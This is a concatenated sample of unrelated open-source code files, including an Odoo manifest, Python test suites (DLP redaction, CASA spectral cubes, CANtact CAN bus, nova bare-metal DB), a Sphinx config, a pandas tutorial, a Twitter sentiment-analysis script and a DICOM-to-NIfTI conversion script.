# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# | GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
{'name': 'Purchase All Shipments',
 'version': '1.0',
 'author': "Camptocamp,Odoo Community Association (OCA)",
 'category': 'Purchases',
 'license': 'AGPL-3',
 # Only depends on the core purchase module.
 'depends': ['purchase'],
 # View extension on purchase orders.
 'data': ['view/purchase_order.xml'],
 }
|
googleapis/python-dlp | samples/snippets/redact_test.py | Python | apache-2.0 | 1,601 | 0.000625 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# | http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in w | riting, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shutil
import tempfile
import pytest
import redact
GCLOUD_PROJECT = os.getenv("GOOGLE_CLOUD_PROJECT")
RESOURCE_DIRECTORY = os.path.join(os.path.dirname(__file__), "resources")
@pytest.fixture(scope="module")
def tempdir():
    """Provide a module-scoped scratch directory, removed after the tests."""
    path = tempfile.mkdtemp()
    yield path
    shutil.rmtree(path)
def test_redact_image_file(tempdir, capsys):
    """redact_image writes a redacted copy and reports the output path."""
    test_filepath = os.path.join(RESOURCE_DIRECTORY, "test.png")
    output_filepath = os.path.join(tempdir, "redacted.png")
    redact.redact_image(
        GCLOUD_PROJECT, test_filepath, output_filepath, ["FIRST_NAME", "EMAIL_ADDRESS"],
    )
    out, _ = capsys.readouterr()
    # The sample prints the path it wrote to; that is all we can assert here.
    assert output_filepath in out
def test_redact_image_all_text(tempdir, capsys):
    """redact_image_all_text should print the path of the redacted output file."""
    source_png = os.path.join(RESOURCE_DIRECTORY, "test.png")
    redacted_png = os.path.join(tempdir, "redacted.png")
    redact.redact_image_all_text(GCLOUD_PROJECT, source_png, redacted_png)
    captured, _ = capsys.readouterr()
    assert redacted_png in captured
|
radio-astro-tools/spectral-cube | spectral_cube/tests/test_casafuncs.py | Python | bsd-3-clause | 9,896 | 0.003133 | from __future__ import print_function, absolute_import, division
import os
import shutil
from itertools import product
import pytest
import numpy as np
from numpy.testing import assert_allclose
from astropy.tests.helper import assert_quantity_allclose
from astropy import units as u
from casa_formats_io import coordsys_to_astropy_wcs
from ..io.casa_masks import make_casa_mask
from .. import StokesSpectralCube, BooleanArrayMask
from .. import SpectralCube, VaryingResolutionSpectralCube
try:
import casatools
from casatools import image
CASA_INSTALLED = True
except ImportError:
try:
from taskinit import ia as image
CASA_INSTALLED = True
except ImportError:
CASA_INSTALLED = False
DATA = os.path.join(os.path.dirname(__file__), 'data')
def make_casa_testimage(infile, outname):
    """Convert the FITS file *infile* into a CASA image at *outname*.

    If the cube has per-channel beams (VaryingResolutionSpectralCube), the
    restoring beams are copied into the CASA image as well. Requires a CASA
    environment (casatools or taskinit); raises otherwise.
    """
    infile = str(infile)
    outname = str(outname)
    if not CASA_INSTALLED:
        raise Exception("Attempted to make a CASA test image in a non-CASA "
                        "environment")
    # Convert FITS -> CASA image and release the tool's lock on it.
    ia = image()
    ia.fromfits(infile=infile, outfile=outname, overwrite=True)
    ia.unlock()
    ia.close()
    ia.done()
    cube = SpectralCube.read(infile)
    if isinstance(cube, VaryingResolutionSpectralCube):
        ia.open(outname)
        # populate restoring beam emptily
        # (sizing the per-channel beam table by writing the last channel first)
        ia.setrestoringbeam(major={'value':1.0, 'unit':'arcsec'},
                            minor={'value':1.0, 'unit':'arcsec'},
                            pa={'value':90.0, 'unit':'deg'},
                            channel=len(cube.beams)-1,
                            polarization=-1,
                           )
        # populate each beam (hard assumption of 1 poln)
        for channum, beam in enumerate(cube.beams):
            casabdict = {'major': {'value':beam.major.to(u.deg).value, 'unit':'deg'},
                         'minor': {'value':beam.minor.to(u.deg).value, 'unit':'deg'},
                         'positionangle': {'value':beam.pa.to(u.deg).value, 'unit':'deg'}
                        }
            ia.setrestoringbeam(beam=casabdict, channel=channum, polarization=0)
        ia.unlock()
        ia.close()
        ia.done()
@pytest.fixture
def filename(request):
    # Indirect fixture: resolves the fixture whose *name* was supplied via
    # parametrize, so tests can be parametrized over other fixtures
    # (e.g. 'data_adv', 'data_advs', ...).
    return request.getfixturevalue(request.param)
@pytest.mark.parametrize(('memmap', 'bigendian'), product((False, True), (False, True)))
def test_casa_read_basic(memmap, bigendian):
    """Read a bundled CASA image in all endian/memmap combinations."""
    # Check that SpectralCube.read works for an example CASA dataset stored
    # in the tests directory. This test should NOT require CASA, whereas a
    # number of tests below require CASA to generate test datasets. The present
    # test is to ensure CASA is not required for reading.
    if bigendian:
        cube = SpectralCube.read(os.path.join(DATA, 'basic_bigendian.image'), memmap=memmap)
    else:
        cube = SpectralCube.read(os.path.join(DATA, 'basic.image'), memmap=memmap)
    assert cube.shape == (3, 4, 5)
    assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
                    [2.406271e+01, 2.993521e+01, 1.421911e+09])
    # Carry out an operation to make sure the underlying data array works
    cube.moment0()
    # Slice the dataset
    assert_quantity_allclose(cube.unmasked_data[0, 0, :],
                             [1, 1, 1, 1, 1] * u.Jy / u.beam)
    assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u.Jy / u.beam)
def test_casa_read_basic_nodask():
    """Reading a CASA image with use_dask=False must raise a ValueError."""
    path = os.path.join(DATA, 'basic.image')
    expected = 'Loading CASA datasets is not possible with use_dask=False'
    with pytest.raises(ValueError, match=expected):
        SpectralCube.read(path, use_dask=False)
def test_casa_read_basic_nomask():
    """Read a bundled CASA image that carries no mask table."""
    # Make sure things work well if there is no mask in the data
    cube = SpectralCube.read(os.path.join(DATA, 'nomask.image'))
    assert cube.shape == (3, 4, 5)
    assert_allclose(cube.wcs.pixel_to_world_values(1, 2, 3),
                    [2.406271e+01, 2.993521e+01, 1.421911e+09])
    # Carry out an operation to make sure the underlying data array works
    cube.moment0()
    # Slice the dataset
    assert_quantity_allclose(cube.unmasked_data[0, 0, :],
                             [1, 1, 1, 1, 1] * u.Jy / u.beam)
    assert_quantity_allclose(cube.unmasked_data[0, 1, 2], 1 * u.Jy / u.beam)
    # Slice the cube
    assert_quantity_allclose(cube[:, 0, 0],
                             [1, 1, 1] * u.Jy / u.beam)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', 'data_sdav',
                                      'data_vad', 'data_vsad'),
                         indirect=['filename'])
def test_casa_read(filename, tmp_path):
    """FITS and CASA round-trips of the same cube must agree exactly."""
    # Check that SpectralCube.read returns data with the same shape and values
    # if read from CASA as if read from FITS.
    cube = SpectralCube.read(filename)
    make_casa_testimage(filename, tmp_path / 'casa.image')
    casacube = SpectralCube.read(tmp_path / 'casa.image')
    assert casacube.shape == cube.shape
    assert_allclose(casacube.unmasked_data[:].value,
                    cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
@pytest.mark.parametrize('filename', ('data_adv', 'data_advs', 'data_sdav',
                                      'data_vad', 'data_vsad'),
                         indirect=['filename'])
def test_casa_read_nomask(filename, tmp_path):
    """Reading must still work after the mask0 table is deleted on disk."""
    # As for test_casa_read, but we remove the mask to make sure
    # that we can still read in the cubes
    cube = SpectralCube.read(filename)
    make_casa_testimage(filename, tmp_path / 'casa.image')
    shutil.rmtree(tmp_path / 'casa.image' / 'mask0')
    casacube = SpectralCube.read(tmp_path / 'casa.image')
    assert casacube.shape == cube.shape
    assert_allclose(casacube.unmasked_data[:].value,
                    cube.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_read_stokes(data_advs, tmp_path):
    """Stokes-I data must survive a FITS -> CASA -> StokesSpectralCube round-trip."""
    # Check that StokesSpectralCube.read returns data with the same shape and values
    # if read from CASA as if read from FITS.
    cube = StokesSpectralCube.read(data_advs)
    make_casa_testimage(data_advs, tmp_path / 'casa.image')
    casacube = StokesSpectralCube.read(tmp_path / 'casa.image')
    assert casacube.I.shape == cube.I.shape
    assert_allclose(casacube.I.unmasked_data[:].value,
                    cube.I.unmasked_data[:].value)
@pytest.mark.skipif(not CASA_INSTALLED, reason='CASA tests must be run in a CASA environment.')
def test_casa_mask(data_adv, tmp_path):
# This tests the make_casa_mask function which can be used to create a mask
# file in an existing image.
cube = SpectralCube.read(data_adv)
mask_array = np.array([[True, False], [False, False], [True, True]])
bool_mask = BooleanArrayMask(mask=mask_array, wcs=cube._wcs,
shape=cube.shape)
cube = cube.with_mask(bool_mask)
make_casa_mask(cube, str(tmp_path / 'casa.mask'), add_stokes=False,
append_to_image=False, overwrite=True)
ia = casatools.image()
ia.open(str(tmp_path / 'casa.mask'))
casa_mask = ia.getchunk()
coords = ia.coordsys()
ia.unlock()
ia.close()
ia.done()
# Test masks
# Mask array is broadcasted to the cube shape. Mimic this, switch to ints,
# and transpose to match CASA image.
compare_mask = np.tile(mask_array, (4, 1, 1)).astype('int16').T
assert np.all(compare_mask == casa_mask)
# Test WCS info
# Convert back to an astropy wcs object so transforms are dealt with.
casa_wcs = coordsys_to_astropy_wcs(coords.torecord())
header = casa_wcs.to_header() # Invokes transform
# Compare some basic properties EXCLUDING the spectral axis
assert_allclose(cube.wcs.wcs.crval[:2], casa_wcs.wcs.crval[:2])
assert_allclose(cube.wcs.wcs.cdelt[:2], casa_wcs.wcs.cdelt[:2])
assert np.all(list(cu |
forweipan/fimap | src/pybing/query/web.py | Python | gpl-2.0 | 514 | 0.005837 | # This file is part of PyBing (http://pybing.googlecode.com).
#
# Copyright (C) 2009 JJ Geewax http://geewax.org/
# All rights reserved.
#
# This software is licensed as described in the file COPYING.txt,
# which you should have received as part of this distribution.
"""
This module holds the Bing WebQuery class used to do web searches against Bing.
"""
| from pybing import constants
from pybing.query import BingQuery, Pagable
class WebQuery(BingQuery, Pagable):
    # Query against the "Web" vertical of the Bing API; Pagable mixes in
    # result-paging support. SOURCE_TYPE selects the source in the request.
    SOURCE_TYPE = constants.WEB_SOURCE_TYPE
kjjuno/GitComponentVersion | docs/source/conf.py | Python | mit | 4,802 | 0.000416 | # -*- coding: utf-8 -*-
#
# GitComponentVersion documentation build configuration file, created by
# sphinx-quickstart on Tue Apr 11 10:51:23 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'GitComponentVersion'
copyright = u'2017, Kevin Johnson'
author = u'Kevin Johnson'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.0.1'
# The full version, including alpha/beta/rc tags.
release = u'0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'GitComponentVersiondoc'
# -- Options for LaTeX output ---------------------------------------------
# All LaTeX options are left commented out, so Sphinx falls back to its
# built-in defaults; uncomment an entry to override it.
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'GitComponentVersion.tex', u'GitComponentVersion Documentation',
u'Kevin Johnson', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'gitcomponentversion', u'GitComponentVersion Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'GitComponentVersion', u'GitComponentVersion Documentation',
author, 'GitComponentVersion', 'One line description of project.',
'Miscellaneous'),
]
|
mattmcd/PyAnalysis | mda/tutorial/pandastut.py | Python | apache-2.0 | 1,920 | 0.018229 | #"10 Minutes to pandas" tutorial
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
class ObjectCreator:
    """Object creation demo (pandas "10 Minutes to pandas" tutorial)."""

    def __init__(self):
        # Placeholder list kept for parity with the tutorial skeleton.
        self.data = []

    def createSeries(self):
        """Return a simple Series that includes a NaN value."""
        return pd.Series([1, 3, 5, np.nan, 6, 8])

    def createDataFrame(self):
        """Return a 6x4 random DataFrame indexed by consecutive dates."""
        index = pd.date_range('20130101', periods=6)
        return pd.DataFrame(np.random.randn(6, 4), index=index,
                            columns=list('ABCD'))

    def createDataFrameFromDict(self):
        """Return a DataFrame built from a dict of mixed-type columns."""
        columns = {
            'A': 1.,
            'B': pd.Timestamp('20130102'),
            'C': pd.Series(1, index=list(range(4)), dtype='float32'),
            'D': np.array([3] * 4, dtype='int32'),
            'E': pd.Categorical(["test", "train", "test", "train"]),
            'F': 'foo',
        }
        return pd.DataFrame(columns)
class Viewer:
    """Example of DataFrame data viewer methods.

    Wraps a DataFrame and prints the results of the pandas inspection API
    (head/tail/index/columns/values/describe). When no frame is supplied,
    a demo frame is built via ObjectCreator.

    NOTE(review): the original used Python-2-only print statements; the
    single-argument print(...) form below produces identical output on
    both Python 2 and Python 3.
    """
    def __init__(self, df=None):
        if df is None:
            creator = ObjectCreator()
            df = creator.createDataFrame()
        self.df = df

    def all(self):
        """View all data"""
        print("All data: df")
        print(self.df)

    def head(self, lineCount=None):
        """Print the first lineCount rows (None prints all rows)."""
        print("Head: df.head({})".format(lineCount))
        print(self.df.head(lineCount))

    def tail(self, lineCount=None):
        """Print the last lineCount rows (None prints all rows)."""
        print("Tail: df.tail({})".format(lineCount))
        print(self.df.tail(lineCount))

    def getIndex(self, lineCount=None):
        """Print the frame's index (lineCount unused, kept for API parity)."""
        print("Data index: df.index")
        print(self.df.index)

    def getColumns(self, lineCount=None):
        """Print the frame's columns (lineCount unused, kept for API parity)."""
        print("Data columns: df.columns")
        print(self.df.columns)

    def getValues(self, lineCount=None):
        """Print the underlying ndarray (lineCount unused, kept for API parity)."""
        print("Data values: df.values")
        print(self.df.values)

    def describe(self, lineCount=None):
        """Print summary statistics (lineCount unused, kept for API parity)."""
        print("Describe data: df.describe()")
        print(self.df.describe())
|
vprusso/youtube_tutorials | twitter_python/part_5_sentiment_analysis_tweet_data/sentiment_anaylsis_twitter_data.py | Python | gpl-3.0 | 4,622 | 0.004976 | from tweepy import API
from tweepy import Cursor
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from textblob import TextBlob
import twitter_credentials
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import re
# # # # TWITTER CLIENT # # # #
class TwitterClient():
    """Thin wrapper over an authenticated tweepy API client.

    twitter_user selects whose timeline/friends are fetched; None means
    the authenticated account (tweepy's default for id=None).
    """
    def __init__(self, twitter_user=None):
        self.auth = TwitterAuthenticator().authenticate_twitter_app()
        self.twitter_client = API(self.auth)
        self.twitter_user = twitter_user
    def get_twitter_client_api(self):
        """Expose the raw tweepy API object for direct calls."""
        return self.twitter_client
    def get_user_timeline_tweets(self, num_tweets):
        """Collect up to num_tweets statuses from the user's timeline."""
        tweets = []
        for tweet in Cursor(self.twitter_client.user_timeline, id=self.twitter_user).items(num_tweets):
            tweets.append(tweet)
        return tweets
    def get_friend_list(self, num_friends):
        """Collect up to num_friends accounts the user follows."""
        friend_list = []
        for friend in Cursor(self.twitter_client.friends, id=self.twitter_user).items(num_friends):
            friend_list.append(friend)
        return friend_list
    def get_home_timeline_tweets(self, num_tweets):
        """Collect up to num_tweets statuses from the home timeline."""
        home_timeline_tweets = []
        for tweet in Cursor(self.twitter_client.home_timeline, id=self.twitter_user).items(num_tweets):
            home_timeline_tweets.append(tweet)
        return home_timeline_tweets
# # # # TWITTER AUTHENTICATER # # # #
class TwitterAuthenticator():
    """Build an authenticated OAuth handler from stored app credentials."""
    def authenticate_twitter_app(self):
        # Consumer/access credentials come from the local twitter_credentials module.
        auth = OAuthHandler(twitter_credentials.CONSUMER_KEY, twitter_credentials.CONSUMER_SECRET)
        auth.set_access_token(twitter_credentials.ACCESS_TOKEN, twitter_credentials.ACCESS_TOKEN_SECRET)
        return auth
# # # # TWITTER STREAMER # # # #
class TwitterStreamer():
    """
    Class for streaming and processing live tweets.
    """
    def __init__(self):
        self.twitter_autenticator = TwitterAuthenticator()
    def stream_tweets(self, fetched_tweets_filename, hash_tag_list):
        """Stream tweets matching hash_tag_list, appending them to a file."""
        # This handles Twitter authentication and the connection to the
        # Twitter Streaming API
        listener = TwitterListener(fetched_tweets_filename)
        auth = self.twitter_autenticator.authenticate_twitter_app()
        stream = Stream(auth, listener)
        # This line filters Twitter Streams to capture data by the keywords:
        stream.filter(track=hash_tag_list)
# # # # TWITTER STREAM LISTENER # # # #
class TwitterListener(StreamListener):
    """
    This is a basic listener that just prints received tweets to stdout.
    """
    def __init__(self, fetched_tweets_filename):
        # Path of the file each raw tweet payload is appended to.
        self.fetched_tweets_filename = fetched_tweets_filename
    def on_data(self, data):
        """Print and persist each raw payload; always keep the stream alive."""
        try:
            print(data)
            with open(self.fetched_tweets_filename, 'a') as tf:
                tf.write(data)
            return True
        except BaseException as e:
            # Swallow write/print failures so a single bad payload does not
            # kill the stream; the error is reported to stdout.
            print("Error on_data %s" % str(e))
            return True
    def on_error(self, status):
        if status == 420:
            # Returning False on_data method in case rate limit occurs.
            return False
        print(status)
class TweetAnalyzer():
    """Analyze and tabulate tweet content."""

    def clean_tweet(self, tweet):
        """Strip @mentions, URLs and punctuation, collapsing whitespace."""
        stripped = re.sub("(@[A-Za-z0-9]+)|([^0-9A-Za-z \t])|(\w+:\/\/\S+)", " ", tweet)
        return ' '.join(stripped.split())

    def analyze_sentiment(self, tweet):
        """Classify polarity as 1 (positive), 0 (neutral) or -1 (negative)."""
        polarity = TextBlob(self.clean_tweet(tweet)).sentiment.polarity
        if polarity > 0:
            return 1
        if polarity == 0:
            return 0
        return -1

    def tweets_to_data_frame(self, tweets):
        """Tabulate tweet metadata into a DataFrame (one row per tweet)."""
        df = pd.DataFrame(data=[t.text for t in tweets], columns=['tweets'])
        df['id'] = np.array([t.id for t in tweets])
        df['len'] = np.array([len(t.text) for t in tweets])
        df['date'] = np.array([t.created_at for t in tweets])
        df['source'] = np.array([t.source for t in tweets])
        df['likes'] = np.array([t.favorite_count for t in tweets])
        df['retweets'] = np.array([t.retweet_count for t in tweets])
        return df
if __name__ == '__main__':
    # Demo: pull the 200 most recent tweets from one account, tabulate them,
    # attach a per-tweet sentiment score, and print a preview.
    twitter_client = TwitterClient()
    tweet_analyzer = TweetAnalyzer()
    api = twitter_client.get_twitter_client_api()
    tweets = api.user_timeline(screen_name="realDonaldTrump", count=200)
    df = tweet_analyzer.tweets_to_data_frame(tweets)
    df['sentiment'] = np.array([tweet_analyzer.analyze_sentiment(tweet) for tweet in df['tweets']])
    print(df.head(10))
|
shanqing-cai/MRI_analysis | convert_dcm.py | Python | bsd-3-clause | 3,563 | 0.006736 | #!/usr/bin/env python
import os
import sys
import glob
import argparse
from scai_utils import *
help_doc = "Convert raw DICOM images to nii format. (scai)"
# === Heuristics === #
# Each entry maps a substring of a dcm2nii output filename to the canonical
# image-type folder name used when renaming; the first match wins (see the
# conversion loop in __main__ below).
heur = [["functionalsparse", "bold"],
        ["DIFFUSIONHIGHRES10Min", "diffusion"],
        ["AAHeadScout32", "aascout"],
        ["tflmghmultiecho1mmiso", "T1"],
        ["localizer", "localizer"],
        ["restingstate", "resting"],
        ["t2spc", "t2spc"]]
if __name__ == "__main__":
    # --- Parse and validate command-line arguments --- #
    ap = argparse.ArgumentParser(description=help_doc)
    ap.add_argument("inputDir", type=str,
                    help="Input raw DICOM data directory")
    ap.add_argument("outputDir", type=str,
                    help="Output directory (for saving the .nii.gz files)")
    ap.add_argument("sID", type=str,
                    help="Subject ID (e.g., ANS_M01)")
    if len(sys.argv) == 1:
        ap.print_help()
        sys.exit(0)
    args = ap.parse_args()
    check_dir(args.inputDir)
    check_dir(args.outputDir, bCreate=True)
    # --- Create a scratch directory for the raw dcm2nii output --- #
    tmpDir = os.path.join(args.outputDir, "tmp_convert_dcm")
    check_dir(args.outputDir, bCreate=True)
    delete_file_if_exists(tmpDir, recursive=True)
    check_dir(tmpDir, bCreate=True)
    dcm2nii_cmd = "dcm2nii -a n -o %s %s" \
                  % (os.path.abspath(tmpDir),
                     os.path.join(os.path.abspath(args.inputDir), "*"))
    saydo(dcm2nii_cmd)
    # --- Apply heuristics to move and rename the converted files --- #
    niis = glob.glob(os.path.join(tmpDir, "*.nii.gz"))
    niis.sort()
    bvec_bval_done = False
    for (i0, nii) in enumerate(niis):
        (nfp, nfn) = os.path.split(nii)
        # First heuristic whose substring appears in the filename wins.
        imgStr = ""
        imgType = ""
        for (i1, t_item) in enumerate(heur):
            if t_item[0] in nfn:
                imgStr = t_item[0]
                imgType = t_item[1]
                break
        if imgType == "":
            # Fixed from the Python-2-only "raise Exception, msg" statement;
            # this call form behaves identically under Python 2 and 3.
            raise Exception("Unrecognized image type for image file name %s"
                            % nii)
        # == Parse file name: remove the 15-character timestamp span that
        #    dcm2nii embeds around the single underscore (8 chars before it
        #    through 6 after), leaving prefix and suffix == #
        # NOTE(review): these asserts validate dcm2nii naming assumptions and
        # are stripped under `python -O`.
        assert(nfn.endswith(".nii.gz"))
        assert(nfn.count("_") == 1)
        ius = nfn.index("_")
        assert(ius >= 8)
        timeStr = nfn[ius - 8 : ius + 7]
        assert(nfn.count(timeStr) == 1)
        prefix = nfn[:ius - 8]
        nfn1 = nfn.replace(timeStr, "")
        nfn2 = nfn1[len(prefix) :]
        suffix = nfn2.replace(imgStr, "").replace(".nii.gz", "")
        # Destination: <outputDir>/<imgType>/<sID>_<imgType>_<suffix>[_<prefix>].nii.gz
        subDir = os.path.join(args.outputDir, imgType)
        check_dir(subDir, bCreate=True)
        if prefix == "":
            imgFN = os.path.join(subDir,
                                 "%s_%s_%s.nii.gz"
                                 % (args.sID, imgType, suffix))
        else:
            imgFN = os.path.join(subDir,
                                 "%s_%s_%s_%s.nii.gz"
                                 % (args.sID, imgType, suffix, prefix))
        saydo("cp %s %s" % (nii, imgFN))
        check_file(imgFN)
        # Copy the diffusion gradient tables once, alongside the first DWI.
        if imgType == "diffusion" and not bvec_bval_done:
            bvec = nii.replace(".nii.gz", ".bvec")
            bval = nii.replace(".nii.gz", ".bval")
            check_file(bvec)
            check_file(bval)
            bvec_new = imgFN.replace(".nii.gz", ".bvec")
            bval_new = imgFN.replace(".nii.gz", ".bval")
            saydo("cp %s %s" % (bvec, bvec_new))
            saydo("cp %s %s" % (bval, bval_new))
            bvec_bval_done = True
    # === Remove temporary directory === #
    saydo("rm -rf %s" % tmpDir)
|
Akhail/Tebless | tebless/utils/keyboard.py | Python | mit | 550 | 0 | # Copyright (c) 2017 Michel Betancourt
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
"""Global constants
"""
import sys
import blessed
TERM = blessed.Terminal()
class Key | board(object):
def __getattr__(self, name):
assert isinstance(name, str)
if name.startswith("KEY_") and name in TERM.__dict__:
return TERM.__dict__.get(name)
raise AttributeError(
"type object 'Keyboard' has no attribute '{}'".format(name))
sys.modules[__name__] = Keyboard()
|
hardbyte/python-can | test/test_cantact.py | Python | lgpl-3.0 | 2,119 | 0.000944 | #!/usr/bin/env python
"""
Tests for CANtact interfaces
"""
import unittest
import can
from can.interfaces import cantact
class CantactTest(unittest.TestCase):
    """Tests for the CANtact backend, driven against cantact.MockInterface."""
    def test_bus_creation(self):
        """Default construction configures bitrate (not bit timing) and starts."""
        bus = can.Bus(channel=0, bustype="cantact", _testing=True)
        self.assertIsInstance(bus, cantact.CantactBus)
        cantact.MockInterface.set_bitrate.assert_called()
        cantact.MockInterface.set_bit_timing.assert_not_called()
        cantact.MockInterface.set_enabled.assert_called()
        cantact.MockInterface.set_monitor.assert_called()
        cantact.MockInterface.start.assert_called()
    def test_bus_creation_bittiming(self):
        """Passing a BitTiming uses set_bit_timing instead of set_bitrate."""
        cantact.MockInterface.set_bitrate.reset_mock()
        bt = can.BitTiming(tseg1=13, tseg2=2, brp=6, sjw=1)
        bus = can.Bus(channel=0, bustype="cantact", bit_timing=bt, _testing=True)
        self.assertIsInstance(bus, cantact.CantactBus)
        cantact.MockInterface.set_bitrate.assert_not_called()
        cantact.MockInterface.set_bit_timing.assert_called()
        cantact.MockInterface.set_enabled.assert_called()
        cantact.MockInterface.set_monitor.assert_called()
        cantact.MockInterface.start.assert_called()
    def test_transmit(self):
        """send() forwards the frame to the interface."""
        bus = can.Bus(channel=0, bustype="cantact", _testing=True)
        msg = can.Message(
            arbitration_id=0xC0FFEF, data=[1, 2, 3, 4, 5, 6, 7, 8], is_extended_id=True
        )
        bus.send(msg)
        cantact.MockInterface.send.assert_called()
    def test_recv(self):
        """recv() with a timeout yields a can.Message from the interface."""
        bus = can.Bus(channel=0, bustype="cantact", _testing=True)
        frame = bus.recv(timeout=0.5)
        cantact.MockInterface.recv.assert_called()
        self.assertIsInstance(frame, can.Message)
    def test_recv_timeout(self):
        """recv() with a zero timeout returns None when nothing is pending."""
        bus = can.Bus(channel=0, bustype="cantact", _testing=True)
        frame = bus.recv(timeout=0.0)
        cantact.MockInterface.recv.assert_called()
        self.assertIsNone(frame)
    def test_shutdown(self):
        """shutdown() stops the underlying interface."""
        bus = can.Bus(channel=0, bustype="cantact", _testing=True)
        bus.shutdown()
        cantact.MockInterface.stop.assert_called()
|
berrange/nova | nova/tests/virt/baremetal/db/test_bm_node.py | Python | apache-2.0 | 6,886 | 0.000581 | # Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Bare-Metal DB testcase for BareMetalNode
"""
from nova import exception
from nova.tests.virt.baremetal.db import base
from nova.tests.virt.baremetal.db import utils
from nova.virt.baremetal import db
class BareMetalNodesTestCase(base.BMDBTestCase):
    """CRUD and query tests for the bare-metal node DB API."""
    def _create_nodes(self):
        """Insert six nodes with varied host/size attributes; record their ids."""
        nodes = [
            utils.new_bm_node(pm_address='0', service_host="host1",
                              memory_mb=100000, cpus=100, local_gb=10000),
            # Node '1' is the only one associated with an instance.
            utils.new_bm_node(pm_address='1', service_host="host2",
                              instance_uuid='A',
                              memory_mb=100000, cpus=100, local_gb=10000),
            utils.new_bm_node(pm_address='2', service_host="host2",
                              memory_mb=1000, cpus=1, local_gb=1000),
            utils.new_bm_node(pm_address='3', service_host="host2",
                              memory_mb=1000, cpus=2, local_gb=1000),
            utils.new_bm_node(pm_address='4', service_host="host2",
                              memory_mb=2000, cpus=1, local_gb=1000),
            utils.new_bm_node(pm_address='5', service_host="host2",
                              memory_mb=2000, cpus=2, local_gb=1000),
        ]
        self.ids = []
        for n in nodes:
            ref = db.bm_node_create(self.context, n)
            self.ids.append(ref['id'])
    def test_get_all(self):
        """get_all returns [] on an empty table and all six created nodes."""
        r = db.bm_node_get_all(self.context)
        self.assertEqual(r, [])
        self._create_nodes()
        r = db.bm_node_get_all(self.context)
        self.assertEqual(len(r), 6)
    def test_get(self):
        """get by id returns the right node; unknown id raises NodeNotFound."""
        self._create_nodes()
